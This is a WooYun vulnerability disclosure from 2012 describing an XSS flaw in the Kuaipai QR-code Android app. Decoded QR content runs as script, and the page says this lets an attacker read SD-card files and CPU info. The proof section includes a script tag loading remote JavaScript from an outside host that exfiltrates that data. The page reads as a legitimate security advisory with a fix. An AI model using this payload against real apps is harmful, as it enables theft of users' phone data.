当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010810

漏洞标题:二维码软件任意读取SD卡漏洞

相关厂商:北京灵动快拍信息技术有限公司

漏洞作者: insight-labs

提交时间:2012-08-12 01:25

修复时间:2012-09-26 01:25

公开时间:2012-09-26 01:25

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

快拍二维码在显示解析出来的二维码内容的时候未做任何过滤,导致产生XSS。

详细说明:

快拍二维码对二维码处理后显示的时候未过滤和编码,导致可以进行XSS攻击。
可以通过嵌入脚本执行任意的JS代码,可以通过发送ajax请求对有权限的文件进行去读,并且将读取到的内容发送到网络上。可以获取包括SD卡中软件数据,以及手机的cpu信息等。

漏洞证明:

测试代码

<script>alert(\www.insight-labs.org\);</script>


<script src=http://www.sec06.com/xss.js></script>


以上两个代码的二维码图片为(大家可以扫描测试):



用快拍二维码扫描第二个二维码图片,然后访问http://www.sec06.com/MobileInfo.txt就可以看到你手机的CPU信息。
代码大家可以看http://www.sec06.com/xss.js的代码。
注:本人手机系统是Android2.2的系统。快拍二维码软件为最新版本。其他系统未测试。
以下是获取手机CPU信息并且发送到网络的动态图片。GIF图片有点大,请大家等待一会。

修复方案:

对解析出的内容进行编码处理。

版权声明:转载请注明来源 insight-labs@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝